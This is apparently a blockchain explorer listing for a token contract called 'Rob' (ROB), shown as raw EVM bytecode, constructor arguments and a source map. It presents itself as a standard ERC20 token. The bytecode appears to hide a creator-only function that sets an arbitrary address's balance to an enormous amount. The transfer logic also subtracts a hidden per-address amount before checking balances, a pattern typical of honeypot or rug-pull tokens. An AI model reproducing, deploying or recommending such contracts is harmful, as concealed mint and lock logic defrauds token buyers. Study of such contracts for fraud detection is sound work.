000000000000000000000000000000081526004016109a9906115ee565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a9091906116ee565b60405180910390a3505050565b6000610aa98484610761565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b335781811015610b15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0c9061162e565b60405180910390fd5b610b328484610b2d8585610f8f90919063ffffffff16565b6108d2565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ba9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ba09061168e565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c10906115ae565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610cb182600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f8f90919063ffffffff16565b905082811015610cf6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ced9061164e565b60405180910390fd5b610d098382610f8f90919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610d9e83600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461086c90919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610e3e91906116ee565b60405180910390a35050505050565b610e556108ca565b73ffffffffffffffffffffffffffffffffffffffff16610e736105fc565b73ffffffffffffffffffffffffffffffffffffffff1614610ec9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec09061166e565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000610fd183836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610fd9565b905092915050565b6000838311158290611021576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611018919061158c565b60405180910390fd5b50600083856110309190611796565b9050809150509392505050565b60008135905061104c816118f3565b92915050565b6000813590506110618161190a565b92915050565b60006020828403121561107957600080fd5b60006110878482850161103d565b91505092915050565b600080604083850312156110a357600080fd5b60006110b18582860161103d565b92505060206110c28582860161103d565b9150509250929050565b6000806000606084860312156110e157600080fd5b60006110ef8682870161103d565b93505060206111008682870161103d565b925050604061111186828701611052565b9150509250925092565b6000806040838503121561112e57600080fd5b600061113c8582860161103d565b925050602061114d85828601611052565b9150509250929050565b611160816117ca565b82525050565b61116f816117dc565b82525050565b600061118082611724565b61118a818561172f565b935061119a81856020860161181f565b6111a3816118e2565b840191505092915050565b60006111bb60238361172f565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061122160268361172f565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061128760228361172f565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006112ed601b8361172f565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b600061132d601d8361172f565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b600061136d60268361172f565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006113d360208361172f565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b600061141360258361172f565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061147960248361172f565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006114df60258361172f565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b61154181611808565b82525050565b61155081611812565b82525050565b600060208201905061156b6000830184611157565b92915050565b60006020820190506115866000830184611166565b92915050565b600060208201905081810360008301526115a68184611175565b905092915050565b600060208201905081810360008301526115c7816111ae565b9050919050565b600060208201905081810360008301526115e781611214565b9050919050565b600060208201905081810360008301526116078161127a565b9050919050565b60006020820190508181036000830152611627816112e0565b9050919050565b6000602082019050818103600083015261164781611320565b9050919050565b6000602082019050818103600083015261166781611360565b9050919050565b60006020820190508181036000830152611687816113c6565b9050919050565b600060208201905081810360008301526116a781611406565b9050919050565b600060208201905081810360008301526116c78161146c565b9050919050565b600060208201905081810360008301526116e7816114d2565b9050919050565b60006020820190506117036000830184611538565b92915050565b600060208201905061171e6000830184611547565b92915050565b600081519050919050565b600082825260208201905092915050565b600061174b82611808565b915061175683611808565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561178b5761178a611884565b5b828201905092915050565b60006117a182611808565b91506117ac83611808565b9250828210156117bf576117be611884565b5b828203905092915050565b60006117d5826117e8565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561183d578082015181840152602081019050611822565b8381111561184c576000848401525b50505050565b6000600282049050600182168061186a57607f821691505b6020821081141561187e5761187d6118b3565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b6118fc816117ca565b811461190757600080fd5b50565b61191381611808565b811461191e57600080fd5b5056fea2646970667358221220af867997be61e49ac78375df01d989c89349d16aabd33a1fda917f1e6e83809d64736f6c63430008000033000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000003526f6200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003524f420000000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c80634c96a389116100a257806395d89b411161007157806395d89b41146102aa578063a457c2d7146102c8578063a9059cbb146102f8578063dd62ed3e14610328578063f2fde38b146103585761010b565b80634c96a3891461023657806370a0823114610252578063715018a6146102825780638da5cb5b1461028c5761010b565b806323b872dd116100de57806323b872dd1461019a578063313ce567146101ca57806339509351146101e85780634b6406d1146102185761010b565b806302d05d3f1461011057806306fdde031461012e578063095ea7b31461014c57806318160ddd1461017c575b600080fd5b610118610374565b6040516101259190611556565b60405180910390f35b61013661039a565b604051610143919061158c565b60405180910390f35b6101666004803603810190610161919061111b565b61042c565b6040516101739190611571565b60405180910390f35b61018461044f565b60405161019191906116ee565b60405180910390f35b6101b460048036038101906101af91906110cc565b610459565b6040516101c19190611571565b60405180910390f35b6101d2610488565b6040516101df9190611709565b60405180910390f35b61020260048036038101906101fd919061111b565b610491565b60405161020f9190611571565b60405180910390f35b6102206104c8565b60405161022d91906116ee565b60405180910390f35b610250600480360381019061024b9190611067565b6104d8565b005b61026c60048036038101906102679190611067565b61059f565b60405161027991906116ee565b60405180910390f35b61028a6105e8565b005b6102946105fc565b6040516102a19190611556565b60405180910390f35b6102b2610625565b6040516102bf919061158c565b60405180910390f35b6102e260048036038101906102dd919061111b565b6106b7565b6040516102ef9190611571565b60405180910390f35b610312600480360381019061030d919061111b565b61073e565b60405161031f9190611571565b60405180910390f35b610342600480360381019061033d9190611090565b610761565b60405161034f91906116ee565b60405180910390f35b610372600480360381019061036d9190611067565b6107e8565b005b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6060600580546103a990611852565b80601f01602080910402602001604051908101604052809291908181526020018280546103d590611852565b80156104225780601f106103f757610100808354040283529160200191610422565b820191906000526020600020905b81548152906001019060200180831161040557829003601f168201915b5050505050905090565b6000806104376108ca565b90506104448185856108d2565b600191505092915050565b6000600454905090565b6000806104646108ca565b9050610471858285610a9d565b61047c858585610b39565b60019150509392505050565b60006012905090565b60008061049c6108ca565b90506104bd8185856104ae8589610761565b6104b89190611740565b6108d2565b600191505092915050565b6b033b2e3c9fd0803ce800000081565b60008060006104e56108ca565b90506000808273ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16141561059757710125dfa371a19e6f7cb54395ca0000000000600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050505050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105f0610e4d565b6105fa6000610ecb565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461063490611852565b80601f016020809104026020016040519081016040528092919081815260200182805461066090611852565b80156106ad5780601f10610682576101008083540402835291602001916106ad565b820191906000526020600020905b81548152906001019060200180831161069057829003601f168201915b5050505050905090565b6000806106c26108ca565b905060006106d08286610761565b905083811015610715576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070c906116ce565b60405180910390fd5b610732828661072d8785610f8f90919063ffffffff16565b6108d2565b60019250505092915050565b6000806107496108ca565b9050610756818585610b39565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107f0610e4d565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610860576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610857906115ce565b60405180910390fd5b61086981610ecb565b50565b600080828461087b9190611740565b9050838110156108c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b79061160e565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610942576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610939906116ae565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156109b2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109a9906115ee565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a9091906116ee565b60405180910390a3505050565b6000610aa98484610761565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b335781811015610b15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0c9061162e565b60405180910390fd5b610b328484610b2d8585610f8f90919063ffffffff16565b6108d2565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ba9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ba09061168e565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c10906115ae565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610cb182600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f8f90919063ffffffff16565b905082811015610cf6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ced9061164e565b60405180910390fd5b610d098382610f8f90919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610d9e83600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461086c90919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610e3e91906116ee565b60405180910390a35050505050565b610e556108ca565b73ffffffffffffffffffffffffffffffffffffffff16610e736105fc565b73ffffffffffffffffffffffffffffffffffffffff1614610ec9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec09061166e565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000610fd183836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610fd9565b905092915050565b6000838311158290611021576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611018919061158c565b60405180910390fd5b50600083856110309190611796565b9050809150509392505050565b60008135905061104c816118f3565b92915050565b6000813590506110618161190a565b92915050565b60006020828403121561107957600080fd5b60006110878482850161103d565b91505092915050565b600080604083850312156110a357600080fd5b60006110b18582860161103d565b92505060206110c28582860161103d565b9150509250929050565b6000806000606084860312156110e157600080fd5b60006110ef8682870161103d565b93505060206111008682870161103d565b925050604061111186828701611052565b9150509250925092565b6000806040838503121561112e57600080fd5b600061113c8582860161103d565b925050602061114d85828601611052565b9150509250929050565b611160816117ca565b82525050565b61116f816117dc565b82525050565b600061118082611724565b61118a818561172f565b935061119a81856020860161181f565b6111a3816118e2565b840191505092915050565b60006111bb60238361172f565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061122160268361172f565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061128760228361172f565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006112ed601b8361172f565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b600061132d601d8361172f565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b600061136d60268361172f565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006113d360208361172f565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b600061141360258361172f565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061147960248361172f565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006114df60258361172f565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b61154181611808565b82525050565b61155081611812565b82525050565b600060208201905061156b6000830184611157565b92915050565b60006020820190506115866000830184611166565b92915050565b600060208201905081810360008301526115a68184611175565b905092915050565b600060208201905081810360008301526115c7816111ae565b9050919050565b600060208201905081810360008301526115e781611214565b9050919050565b600060208201905081810360008301526116078161127a565b9050919050565b60006020820190508181036000830152611627816112e0565b9050919050565b6000602082019050818103600083015261164781611320565b9050919050565b6000602082019050818103600083015261166781611360565b9050919050565b60006020820190508181036000830152611687816113c6565b9050919050565b600060208201905081810360008301526116a781611406565b9050919050565b600060208201905081810360008301526116c78161146c565b9050919050565b600060208201905081810360008301526116e7816114d2565b9050919050565b60006020820190506117036000830184611538565b92915050565b600060208201905061171e6000830184611547565b92915050565b600081519050919050565b600082825260208201905092915050565b600061174b82611808565b915061175683611808565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561178b5761178a611884565b5b828201905092915050565b60006117a182611808565b91506117ac83611808565b9250828210156117bf576117be611884565b5b828203905092915050565b60006117d5826117e8565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561183d578082015181840152602081019050611822565b8381111561184c576000848401525b50505050565b6000600282049050600182168061186a57607f821691505b6020821081141561187e5761187d6118b3565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b6118fc816117ca565b811461190757600080fd5b50565b61191381611808565b811461191e57600080fd5b5056fea2646970667358221220af867997be61e49ac78375df01d989c89349d16aabd33a1fda917f1e6e83809d64736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000003526f6200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003524f420000000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Rob
Arg [1] : symbol_ (string): ROB

-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [3] : 526f620000000000000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [5] : 524f420000000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

11242:10296:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11406:22;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12023:90;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14108:177;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13036:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14799:230;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12902:83;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15388:214;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11514:57;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16873:356;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13183:116;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9180:93;;;:::i;:::-;;8592:77;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12214:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16047:363;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13471:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13689:141;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9410:184;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11406:22;;;;;;;;;;;;;:::o;12023:90::-;12077:13;12103:5;12096:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12023:90;:::o;14108:177::-;14191:4;14201:13;14217:12;:10;:12::i;:::-;14201:28;;14233:32;14242:5;14249:7;14258:6;14233:8;:32::i;:::-;14276:4;14269:11;;;14108:177;;;;:::o;13036:98::-;13097:7;13117:12;;13110:19;;13036:98;:::o;14799:230::-;14896:4;14906:15;14924:12;:10;:12::i;:::-;14906:30;;14940:38;14956:4;14962:7;14971:6;14940:15;:38::i;:::-;14982:27;14992:4;14998:2;15002:6;14982:9;:27::i;:::-;15020:4;15013:11;;;14799:230;;;;;:::o;12902:83::-;12960:5;12978:2;12971:9;;12902:83;:::o;15388:214::-;15476:4;15486:13;15502:12;:10;:12::i;:::-;15486:28;;15518:64;15527:5;15534:7;15571:10;15543:25;15553:5;15560:7;15543:9;:25::i;:::-;:38;;;;:::i;:::-;15518:8;:64::i;:::-;15593:4;15586:11;;;15388:214;;;;:::o;11514:57::-;11550:21;11514:57;:::o;16873:356::-;16920:14;16942;16965:18;16986:12;:10;:12::i;:::-;16965:33;;17005:15;17027;17064:10;17053:21;;:7;;;;;;;;;;;:21;;;17049:146;;;17105:41;17087:8;:15;17096:5;17087:15;;;;;;;;;;;;;;;:59;;;;17049:146;16873:356;;;;;;:::o;13183:116::-;13257:7;13277:8;:17;13286:7;13277:17;;;;;;;;;;;;;;;;13270:24;;13183:116;;;:::o;9180:93::-;8498:17;:15;:17::i;:::-;9238:30:::1;9265:1;9238:18;:30::i;:::-;9180:93::o:0;8592:77::-;8638:7;8658:6;;;;;;;;;;;8651:13;;8592:77;:::o;12214:94::-;12270:13;12296:7;12289:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12214:94;:::o;16047:363::-;16140:4;16150:13;16166:12;:10;:12::i;:::-;16150:28;;16182:24;16209:25;16219:5;16226:7;16209:9;:25::i;:::-;16182:52;;16266:15;16246:16;:35;;16238:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;16327:63;16336:5;16343:7;16352:37;16373:15;16352:16;:20;;:37;;;;:::i;:::-;16327:8;:63::i;:::-;16401:4;16394:11;;;;16047:363;;;;:::o;13471:169::-;13550:4;13560:13;13576:12;:10;:12::i;:::-;13560:28;;13592;13602:5;13609:2;13613:6;13592:9;:28::i;:::-;13631:4;13624:11;;;13471:169;;;;:::o;13689:141::-;13778:7;13798:11;:18;13810:5;13798:18;;;;;;;;;;;;;;;:27;13817:7;13798:27;;;;;;;;;;;;;;;;13791:34;;13689:141;;;;:::o;9410:184::-;8498:17;:15;:17::i;:::-;9512:1:::1;9492:22;;:8;:22;;;;9484:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;9561:28;9580:8;9561:18;:28::i;:::-;9410:184:::0;:::o;3427:157::-;3485:7;3498:9;3514:1;3510;:5;;;;:::i;:::-;3498:17;;3532:1;3527;:6;;3519:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;3578:1;3571:8;;;3427:157;;;;:::o;7902:88::-;7955:7;7975:10;7968:17;;7902:88;:::o;19356:315::-;19468:1;19451:19;;:5;:19;;;;19443:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19542:1;19523:21;;:7;:21;;;;19515:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19619:6;19589:11;:18;19601:5;19589:18;;;;;;;;;;;;;;;:27;19608:7;19589:27;;;;;;;;;;;;;;;:36;;;;19650:7;19634:32;;19643:5;19634:32;;;19659:6;19634:32;;;;;;:::i;:::-;;;;;;;;19356:315;;;:::o;19928:332::-;20022:24;20049:25;20059:5;20066:7;20049:9;:25::i;:::-;20022:52;;20102:17;20082:16;:37;20078:178;;20153:6;20133:16;:26;;20125:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;20197:54;20206:5;20213:7;20222:28;20243:6;20222:16;:20;;:28;;;;:::i;:::-;20197:8;:54::i;:::-;20078:178;19928:332;;;;:::o;17234:556::-;17340:1;17324:18;;:4;:18;;;;17316:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;17410:1;17396:16;;:2;:16;;;;17388:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;17458:17;17478:5;:11;17484:4;17478:11;;;;;;;;;;;;;;;;17458:31;;17493:21;17517:29;17536:9;17517:8;:14;17526:4;17517:14;;;;;;;;;;;;;;;;:18;;:29;;;;:::i;:::-;17493:53;;17575:6;17558:13;:23;;17550:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;17645:25;17663:6;17645:13;:17;;:25;;;;:::i;:::-;17628:8;:14;17637:4;17628:14;;;;;;;;;;;;;;;:42;;;;17726:24;17743:6;17726:8;:12;17735:2;17726:12;;;;;;;;;;;;;;;;:16;;:24;;;;:::i;:::-;17711:8;:12;17720:2;17711:12;;;;;;;;;;;;;;;:39;;;;17774:2;17759:26;;17768:4;17759:26;;;17778:6;17759:26;;;;;;:::i;:::-;;;;;;;;17234:556;;;;;:::o;8733:126::-;8805:12;:10;:12::i;:::-;8794:23;;:7;:5;:7::i;:::-;:23;;;8786:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8733:126::o;9736:167::-;9803:16;9822:6;;;;;;;;;;;9803:25;;9841:8;9832:6;;:17;;;;;;;;;;;;;;;;;;9889:8;9858:40;;9879:8;9858:40;;;;;;;;;;;;9736:167;;:::o;3825:126::-;3883:7;3903:43;3907:1;3910;3903:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;3896:50;;3825:126;;;;:::o;4212:168::-;4298:7;4324:1;4319;:6;;4327:12;4311:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;4344:9;4360:1;4356;:5;;;;:::i;:::-;4344:17;;4374:1;4367:8;;;4212:168;;;;;:::o;7:139:1:-;;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:262::-;;405:2;393:9;384:7;380:23;376:32;373:2;;;421:1;418;411:12;373:2;464:1;489:53;534:7;525:6;514:9;510:22;489:53;:::i;:::-;479:63;;435:117;363:196;;;;:::o;565:407::-;;;690:2;678:9;669:7;665:23;661:32;658:2;;;706:1;703;696:12;658:2;749:1;774:53;819:7;810:6;799:9;795:22;774:53;:::i;:::-;764:63;;720:117;876:2;902:53;947:7;938:6;927:9;923:22;902:53;:::i;:::-;892:63;;847:118;648:324;;;;;:::o;978:552::-;;;;1120:2;1108:9;1099:7;1095:23;1091:32;1088:2;;;1136:1;1133;1126:12;1088:2;1179:1;1204:53;1249:7;1240:6;1229:9;1225:22;1204:53;:::i;:::-;1194:63;;1150:117;1306:2;1332:53;1377:7;1368:6;1357:9;1353:22;1332:53;:::i;:::-;1322:63;;1277:118;1434:2;1460:53;1505:7;1496:6;1485:9;1481:22;1460:53;:::i;:::-;1450:63;;1405:118;1078:452;;;;;:::o;1536:407::-;;;1661:2;1649:9;1640:7;1636:23;1632:32;1629:2;;;1677:1;1674;1667:12;1629:2;1720:1;1745:53;1790:7;1781:6;1770:9;1766:22;1745:53;:::i;:::-;1735:63;;1691:117;1847:2;1873:53;1918:7;1909:6;1898:9;1894:22;1873:53;:::i;:::-;1863:63;;1818:118;1619:324;;;;;:::o;1949:118::-;2036:24;2054:5;2036:24;:::i;:::-;2031:3;2024:37;2014:53;;:::o;2073:109::-;2154:21;2169:5;2154:21;:::i;:::-;2149:3;2142:34;2132:50;;:::o;2188:364::-;;2304:39;2337:5;2304:39;:::i;:::-;2359:71;2423:6;2418:3;2359:71;:::i;:::-;2352:78;;2439:52;2484:6;2479:3;2472:4;2465:5;2461:16;2439:52;:::i;:::-;2516:29;2538:6;2516:29;:::i;:::-;2511:3;2507:39;2500:46;;2280:272;;;;;:::o;2558:367::-;;2721:67;2785:2;2780:3;2721:67;:::i;:::-;2714:74;;2818:34;2814:1;2809:3;2805:11;2798:55;2884:5;2879:2;2874:3;2870:12;2863:27;2916:2;2911:3;2907:12;2900:19;;2704:221;;;:::o;2931:370::-;;3094:67;3158:2;3153:3;3094:67;:::i;:::-;3087:74;;3191:34;3187:1;3182:3;3178:11;3171:55;3257:8;3252:2;3247:3;3243:12;3236:30;3292:2;3287:3;3283:12;3276:19;;3077:224;;;:::o;3307:366::-;;3470:67;3534:2;3529:3;3470:67;:::i;:::